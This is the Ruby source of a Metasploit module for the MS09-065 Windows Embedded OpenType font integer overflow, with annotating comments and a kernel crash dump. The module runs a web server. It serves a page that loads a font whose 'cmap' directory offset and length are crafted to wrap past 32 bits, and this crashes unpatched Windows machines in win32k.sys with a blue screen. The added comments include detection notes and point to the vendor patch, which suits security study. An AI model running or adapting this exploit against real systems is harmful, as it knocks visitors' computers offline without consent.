##
# $Id: ms09_065_eot_integer.rb 7470 2009-11-11 23:48:53Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


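# Extraction artefact repaired: the quotes around the path were rendered as
# typographic quotes, which Ruby does not accept as string delimiters.
require 'msf/core'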
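# Metasploit auxiliary module for MS09-065 / CVE-2009-2514 (OSVDB 59869).
#
# The module runs an HTTP server that hands out a landing page whose CSS
# @font-face rule points back at the same server; the follow-up request is
# answered with an Embedded OpenType (EOT) font whose 'cmap' table directory
# entry carries an offset/length pair that wraps past 32 bits. win32k.sys
# parses the font in kernel mode, so the malformed entry ends in a bug check
# (BSoD) rather than code execution; the crash dump at the end of this file
# documents the resulting fault in win32k!bComputeIDs.
#
# Mitigation is the vendor update referenced in the metadata (MS09-065).
#
# Extraction artefacts in the published listing (typographic quotes, Unicode
# minus signs, one line wrapped inside Msf::Config.install_root) have been
# repaired; the logic is unchanged.
class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module metadata and the single EOTFILE option.
  #
  # @param info [Hash] caller-supplied overrides merged by +update_info+
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Windows EOT Font Table Directory Integer Overflow',
      'Description'    => %q{
        This module exploits an integer overflow flaw in the Microsoft Windows Embedded
        OpenType font parsing code located in win32k.sys. Since the kernel itself parses
        embedded web fonts, it is possible to trigger a BSoD from a normal web page when
        viewed with Internet Explorer.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'hdm',
      'Version'        => '$Revision: 7470 $',
      'References'     =>
        [
          [ 'CVE', '2009-2514' ],
          [ 'MSB', 'MS09-065' ],
          [ 'OSVDB', '59869']
        ],
      'DisclosureDate' => 'Nov 10 2009'
    ))
    # EOTFILE is a template, not the trigger itself: on_request_uri reads it
    # once and patches the 'cmap' directory entry on every font request.
    # The default points at a font shipped in the framework's data directory.
    register_options([
      OptPath.new('EOTFILE', [ true, "The EOT template to use to generate the trigger", File.join(Msf::Config.install_root, "data", "exploits", "pricedown.eot")]),
    ], self.class)

  end

  # Auxiliary entry point. +exploit+ comes from the HttpServer mixin and
  # starts the listener; requests are dispatched to +on_request_uri+.
  def run
    exploit
  end

  # Answers every request to the module's resource with one of two bodies:
  #
  # * a URI ending in the per-run random +@tag+ receives the patched EOT
  #   font as application/octet-stream;
  # * any other URI receives an HTML page whose @font-face rule references
  #   "<resource>/<random stem><@tag>", which makes the browser issue the
  #   tagged request above.
  #
  # Detection note: both the landing page text and the font URI are
  # randomised per run, so the stable artefacts are the @font-face rule that
  # resolves to an application/octet-stream response and the wrapped
  # offset/length pair in the served font, not any fixed string in the URI.
  #
  # @param cli connected client; only +peerhost+/+peerport+ are read, for
  #   status output
  # @param request parsed HTTP request; only +uri+ is inspected
  def on_request_uri(cli, request)
    # Memoised across requests: one tag per module run, and the template is
    # read from disk only once.
    @tag ||= Rex::Text.rand_text_alpha(8)
    # NOTE(review): File.read without a binary mode; on Ruby 1.9+ File.binread
    # would be the safer choice for font data. Left as written.
    @eot ||= ::File.read(datastore['EOTFILE'], ::File.size(datastore['EOTFILE']))

    if(request.uri =~ /#{@tag}$/)
      # Work on a copy so the cached template stays intact for later requests.
      content = @eot.dup

      # Only this table entry seems to trigger the bug
      # NOTE(review): String#index returns nil if the template has no 'cmap'
      # tag, which would surface as a NoMethodError on the arithmetic below;
      # the shipped default template is assumed to contain one.
      cidx = content.index('cmap')

      # Use an offset and a length that overflow when combined
      # clen evaluates to 0x500000ca (the ecx value in the crash dump); the
      # 32-bit sum coff + clen wraps to 0xca, which is the overflow the
      # kernel-side length check does not catch.
      coff = 0xb0000000
      clen = (0xfffffffe - coff + 0xcc)

      # Patch in the modified offset and length values
      # Two big-endian 32-bit words written 8 bytes past the tag, over the
      # directory entry's offset and length fields.
      content[cidx + 8, 8] = [ coff, clen ].pack("N*")

      # Send the font on its merry way
      print_status("Sending embedded font to #{cli.peerhost}:#{cli.peerport}...")
      send_response_html(cli, content, { 'Content-Type' => 'application/octet-stream' })
    else
      # Random filler for title, body text, font file stem and family name;
      # only the +@tag+ suffix appended to var_font is matched by the branch above.
      var_title = Rex::Text.rand_text_alpha(6 + rand(32))
      var_body = Rex::Text.rand_text_alpha(64 + rand(32))
      var_font = Rex::Text.rand_text_alpha(2 + rand(6))
      var_face = Rex::Text.rand_text_alpha(2 + rand(32))

      # The @font-face src resolves to this module's resource plus the tag,
      # so loading the page triggers the font request.
      content = %Q|<html><head><title>#{var_title}</title><style type="text/css">
@font-face{ font-family: '#{var_face}'; src: url('#{get_resource}/#{var_font}#{@tag}'); }
body {
        font-family: '#{var_face}';
}
</style></head><body> #{var_body} </body></html>|

      print_status("Sending HTML page with embedded font to #{cli.peerhost}:#{cli.peerport}...")
      send_response_html(cli, content, { 'Content-Type' => 'text/html' })
    end
  end
end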
=begin

#
# Crash dump information
#

READ_ADDRESS:    b0f70072

FAULTING_IP:
win32k!bComputeIDs+28
bf87c9df 8a6702              mov       ah,byte ptr [edi+2]

MM_INTERNAL_CODE:    0

IMAGE_NAME:    win32k.sys

DEBUG_FLR_IMAGE_TIMESTAMP:     45f013f6

MODULE_NAME: win32k

FAULTING_MODULE: bf800000 win32k

DEFAULT_BUCKET_ID:     DRIVER_FAULT

BUGCHECK_STR:   0x50

PROCESS_NAME:   csrss.exe

TRAP_FRAME: b22192e8 -- (.trap 0xffffffffb22192e8)
ErrCode = 00000000
eax=00000000 ebx=00000000 ecx=500000ca edx=00f70010 esi=b22198d8 edi=b0f70070
eip=bf87c9df esp=b221935c ebp=b2219374 iopl=0         nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000                  efl=00010206
win32k!bComputeIDs+0x28:
bf87c9df 8a6702          mov     ah,byte ptr [edi+2]        ds:0023:b0f70072=??
Resetting default scope

LAST_CONTROL_TRANSFER:     from 804f79d7 to 80526fc8

STACK_TEXT:
b2218e24 804f79d7   00000003   b0f70072   00000000   nt!RtlpBreakWithStatusInstruction
b2218e70 804f85c4   00000003   00000000   c0587b80   nt!KiBugCheckDebugBreak+0x19
b2219250 804f8aef   00000050   b0f70072   00000000   nt!KeBugCheck2+0x574
b2219270 8051c0d3   00000050   b0f70072   00000000   nt!KeBugCheckEx+0x1b
b22192d0 8053f90c   00000000   b0f70072   00000000   nt!MmAccessFault+0x8e7
b22192d0 bf87c9df   00000000   b0f70072   00000000   nt!KiTrap0E+0xcc
b2219374 bf87a391   00f70010   b22198d8   b2219a76   win32k!bComputeIDs+0x28
b22193a8 bf87a02b   00f70010   00004d18   00000000   win32k!bVerifyTTF+0xe1
b2219a68 bf879f0e   e234b668   00f70010   00004d18   win32k!bLoadTTF+0x7c
b2219af0 bf879e48   e234b668   00f70010   00004d18   win32k!bLoadFontFile+0x228
b2219b40 bf879911   00000001   e234b660   b2219bf0   win32k!ttfdSemLoadFontFile+0x4c
b2219b70 bf87989f   00000001   e234b660   b2219bf0   win32k!PDEVOBJ::LoadFontFile+0x3a
b2219ba8 bf96370c   00000000   00000000   e234b660   win32k!vLoadFontFileView+0x12b
b2219c5c bf93eda9   e234b660   00000000   00000000   win32k!PUBLIC_PFTOBJ::hLoadMemFonts+0x6a
b2219cb4 bf9488e4   00f70000   e10ff0b0   00000000   win32k!GreAddFontMemResourceEx+0x76
b2219d48 8053ca28   0297cc48   00004d18   00000000   win32k!NtGdiAddFontMemResourceEx+0xb0
b2219d48 7c90eb94   0297cc48   00004d18   00000000   nt!KiFastCallEntry+0xf8
0172f6dc 00000000   00000000   00000000   00000000   ntdll!KiFastSystemCallRet

win32k!bComputeIDs:
bf87c9b7 8bff               mov       edi,edi
bf87c9b9 55                 push      ebp
bf87c9ba 8bec               mov       ebp,esp
bf87c9bc 83ec10             sub       esp,10h
bf87c9bf 8b450c             mov       eax,dword ptr [ebp+0Ch]
bf87c9c2 8b4804             mov       ecx,dword ptr [eax+4]
bf87c9c5 53                 push      ebx
bf87c9c6   57             push   edi
bf87c9c7   8b38           mov    edi,dword ptr [eax]
bf87c9c9   037d08         add    edi,dword ptr [ebp+8]
bf87c9cc   33db           xor    ebx,ebx
bf87c9ce   33c0           xor    eax,eax
bf87c9d0   83f904         cmp    ecx,4
bf87c9d3   895df8         mov    dword ptr [ebp-8],ebx
bf87c9d6   894dfc         mov    dword ptr [ebp-4],ecx
bf87c9d9   0f82cf000000   jb     win32k!bComputeIDs+0x1be (bf87caae)
bf87c9df   8a6702         mov    ah,byte ptr [edi+2] <--- the crash above

=end